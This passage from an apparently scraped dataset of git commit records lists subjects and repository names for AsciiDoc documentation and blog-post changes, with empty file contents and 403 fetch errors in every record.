2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b914707a10e1de5fa7626c625d631cc294498c66","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4e980eeeb779479e642c2870b68e4a5f6b8d6ec","subject":"Update 2015-09-26-Programming-in-Scala.adoc","message":"Update 2015-09-26-Programming-in-Scala.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aec8b839198fd645eb28a30326c3ead6465cdf08","subject":"y2b create post The Clock Is Ticking...","message":"y2b create post The Clock Is Ticking...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-26-The-Clock-Is-Ticking.adoc","new_file":"_posts\/2016-09-26-The-Clock-Is-Ticking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4fc4bb8c81f746b2b42549d0bb77557d03d2ebe","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c58e846a55c8cd9277d66b0fa9d3219f99b195dc","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce8fa7b9097718b0cbeaa6f819e2927d988dfa04","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49b74f550e6280021e5f41495a7013ed96eb7634","subject":"Update 2018-09-04-this-is-my-life.adoc","message":"Update 2018-09-04-this-is-my-life.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-04-this-is-my-life.adoc","new_file":"_posts\/2018-09-04-this-is-my-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a2a1568589787d9314143e40f57599a21f7d6e5","subject":"#121 Initial version of autocomplete user manual page (work in progress)","message":"#121 Initial version of autocomplete user manual page (work in progress)\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/autocomplete.adoc","new_file":"docs\/autocomplete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a8f27f40d912c31ffa877222d439b6845dc6e79","subject":"Add engine documentation","message":"Add engine documentation\n\n* Includes a code listing by directory, overview of the engine\narchitecture, an overview of some important structures and a general\ntodo list of the things I thought while writing it.\n\n[NOTE]\n====\nTODO: Be less repetitive, and more funny.\n====\n","repos":"RedCraneStudio\/redcrane-engine,RedCraneStudio\/redcrane-engine,RedCraneStudio\/redcrane-engine,RedCraneStudio\/redcrane-engine","old_file":"code.adoc","new_file":"code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RedCraneStudio\/redcrane-engine.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"f8762defb5ed5f4e7eec9fe996ed73ade49d4f9d","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0e21509865f13b7df9fd4b479f6a6389cc0113a","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e11b7aad38cc02c3cd1cdcd487672fe3a9ba4bc3","subject":"Add design.asciidoc explaining Kakoune design","message":"Add design.asciidoc explaining Kakoune design\n","repos":"casimir\/kakoune,elegios\/kakoune,Asenar\/kakoune,alpha123\/kakoune,elegios\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,lenormf\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,Somasis\/kakoune,danr\/kakoune,rstacruz\/kakoune,danielma\/kakoune,ekie\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,Asenar\/kakoune,flavius\/kakoune,alpha123\/kakoune,Somasis\/kakoune,casimir\/kakoune,ekie\/kakoune,danr\/kakoune,Asenar\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,Somasis\/kakoune,lenormf\/kakoune,xificurC\/kakoune,occivink\/kakoune,danielma\/kakoune,xificurC\/kakoune,flavius\/kakoune,danielma\/kakoune,mawww\/kakoune,mawww\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,occivink\/kakoune,casimir\/kakoune,jjthrash\/kakoune,danr\/kakoune,alpha123\/kakoune,xificurC\/kakoune,danr\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,zakgreant\/kakoune,Asenar\/kakoune,ekie\/kakoune,alexherbo2\/kakoune,ekie\/kakoune,rstacruz\/kakoune,casimir\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,danielma\/kakoune,rstacruz\/kakoune,occivink\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,lenormf\/kakoune,elegios\/kakoune,elegios\/kakoune,alpha123\/kakoune,zakgreant\/kakoune,lenormf\/kakoune,xificurC\/kakoune,mawww\/kakoune","old_file":"doc\/design.asciidoc","new_file":"doc\/design.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"f6c30e9f28d60c6214e0ab045522c6c23c2b4abe","subject":"OSIS-195 Updated the technical manual with instructions to update the internship submodule.","message":"OSIS-195 Updated the technical manual with instructions to update the internship submodule.\n","repos":"uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"5cdc5ab436f00f3c6dbfcbde69695cb366ee8723","subject":"Update data_sets.adoc","message":"Update data_sets.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/data_sets.adoc","new_file":"docs\/data_sets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79f61b4c4963f1f8dc06a45fc159efc5bb14d415","subject":"Add skinshop module doc.","message":"Add skinshop module doc.\n","repos":"ImagicTheCat\/vRP,ImagicTheCat\/vRP","old_file":"doc\/dev\/modules\/skinshop.adoc","new_file":"doc\/dev\/modules\/skinshop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImagicTheCat\/vRP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dba6d5838bb8a848ca5f59133c36d4623c23c705","subject":"Update 2015-01-21-Ex-Machina.adoc","message":"Update 2015-01-21-Ex-Machina.adoc","repos":"heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io","old_file":"_posts\/2015-01-21-Ex-Machina.adoc","new_file":"_posts\/2015-01-21-Ex-Machina.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heartnn\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56d220934dfe1bb85c30e160e3735abc1d2a8122","subject":"Update 2015-05-12-First-Post.adoc","message":"Update 2015-05-12-First-Post.adoc","repos":"mubix\/blog.room362.com,mubix\/blog.room362.com,mubix\/blog.room362.com","old_file":"_posts\/2015-05-12-First-Post.adoc","new_file":"_posts\/2015-05-12-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mubix\/blog.room362.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edd93ac4bdae855f9d816fef4882c9c9c9758401","subject":"Update 2016-10-12-First-post.adoc","message":"Update 2016-10-12-First-post.adoc","repos":"cloudmind7\/cloudmind7.github.com,cloudmind7\/cloudmind7.github.com,cloudmind7\/cloudmind7.github.com,cloudmind7\/cloudmind7.github.com,cloudmind7\/cloudmind7.github.com","old_file":"_posts\/2016-10-12-First-post.adoc","new_file":"_posts\/2016-10-12-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cloudmind7\/cloudmind7.github.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9461cb2a86d810219a5d42264ece5a28b41a1c7","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"406d0fbbc0711a28c2cd52fc9cf7ec860ff8d011","subject":"create post The Worst Text You Could Ever Receive...","message":"create post The Worst Text You Could Ever Receive...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Worst-Text-You-Could-Ever-Receive....adoc","new_file":"_posts\/2018-02-26-The-Worst-Text-You-Could-Ever-Receive....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c74da09d264324b83678ebde3a71489d4bb4452","subject":"Update installation-guide-amazon-introduction.adoc","message":"Update installation-guide-amazon-introduction.adoc\n\nfixing typo","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/installation-guide\/amazon-linux\/installation-guide-amazon-introduction.adoc","new_file":"pages\/apim\/3.x\/installation-guide\/amazon-linux\/installation-guide-amazon-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77b822a4209e8c86b2f2a80f09331fa8bc4d1168","subject":"Changing demo gif.","message":"Changing demo gif.\n","repos":"brechin\/hypatia,Applemann\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Applemann\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e011ade27e7db48f159908180cbd34c469a915d5","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f12a1fe22bafc78e335c385208f60ecd9cabdf68","subject":" minor fix","message":" minor fix\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa4dadf8190ed40adfa94b8328e5a8614a27ee49","subject":"Update 2016-03-11-Should-you-bother-visiting-Disneys-Hollywood-Studios-on-your-next-trip.adoc","message":"Update 2016-03-11-Should-you-bother-visiting-Disneys-Hollywood-Studios-on-your-next-trip.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-11-Should-you-bother-visiting-Disneys-Hollywood-Studios-on-your-next-trip.adoc","new_file":"_posts\/2016-03-11-Should-you-bother-visiting-Disneys-Hollywood-Studios-on-your-next-trip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be544d4b9b149001ddb7c73f9502d7456e350376","subject":"Create testing-interfaces.adoc","message":"Create testing-interfaces.adoc","repos":"sobkowiak\/smx-order-service-demo","old_file":"doc\/testing-interfaces.adoc","new_file":"doc\/testing-interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sobkowiak\/smx-order-service-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1beb06f59e8a39f6fc448c10a3304e2a856bbad3","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4e9fc62892ad02ef78452d07d6afcb604a838f6","subject":"Update 2015-07-02-Die-Wolken.adoc","message":"Update 2015-07-02-Die-Wolken.adoc","repos":"havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io","old_file":"_posts\/2015-07-02-Die-Wolken.adoc","new_file":"_posts\/2015-07-02-Die-Wolken.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/havvazaman\/havvazaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecdbf9852c6f544bcb28724e202de41b7441b3bb","subject":"change documentation","message":"change documentation\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"620475c131271321057ed257de84705f8f77128d","subject":"Update 2016-07-25-2016-07-24.adoc","message":"Update 2016-07-25-2016-07-24.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-25-2016-07-24.adoc","new_file":"_posts\/2016-07-25-2016-07-24.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0abcd627e81b17fb80102448912e06413f04a027","subject":"Update 2016-09-12-Why-I-left.adoc","message":"Update 2016-09-12-Why-I-left.adoc","repos":"endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io","old_file":"_posts\/2016-09-12-Why-I-left.adoc","new_file":"_posts\/2016-09-12-Why-I-left.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"745a4f1ae209b0f729814db0e4150c74265a7404","subject":"Update 2016-05-16-blabla-1-2-.adoc","message":"Update 2016-05-16-blabla-1-2-.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-16-blabla-1-2-.adoc","new_file":"_posts\/2016-05-16-blabla-1-2-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57a5aad74bcd5b40b21208dd3e55841e7208c2ac","subject":"Update 2018-06-01-Hello-world.adoc","message":"Update 2018-06-01-Hello-world.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2018-06-01-Hello-world.adoc","new_file":"_posts\/2018-06-01-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc3d89a49707f59d2bc65d7dd5befbf69117597b","subject":"Deleted _posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","message":"Deleted _posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","new_file":"_posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a36c4d4b6afd96d47db74deb538a695a31c92a2","subject":"Update README with mentions of support for JUnit Attachments and Flaky Test Handler","message":"Update README with mentions of support for JUnit Attachments and Flaky Test Handler\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85cee3766153e77220d62605562d2dee3d4954a7","subject":"Remove extended sample from the doc","message":"Remove extended sample from the doc","repos":"corbtastik\/spring-cloud-stream-samples,corbtastik\/spring-cloud-stream-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/corbtastik\/spring-cloud-stream-samples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb990a29fd40c7accedeaa94ada720842954a9a","subject":"KUDU-1198 Expand upon Cloudera Manager version recommendations","message":"KUDU-1198 Expand upon Cloudera Manager version recommendations\n\nChange-Id: I0e1efb45565aa245d95bc26d4cd7fb89d30ee3ac\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1073\nReviewed-by: Ana Krasteva\nTested-by: Ana Krasteva\n","repos":"andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f0dc5bf3271119b0fe65579b1192034fa92e875","subject":"Mark filtered query example as not to be used (#25661)","message":"Mark filtered query example as not to be used (#25661)\n\nThe Filtered Query has been deprecated in favour of the Bool Query with a filter context. However, this deleted page for the Filtered Query is often ranked highly in search results when searching for documentation on \"filtered queries\". Often people just copy the first code snippet they see, which in this case is the INCORRECT syntax (the correct syntax follows). I think reordering the examples would help avoid a lot of confusion (I have seen people make this same mistake 3 times now)\r\n\r\nAdding a comment to indicate that the first example shouldn't be used","repos":"robin13\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,uschindler\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,fred84\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,shreejay\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,masaruh\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elas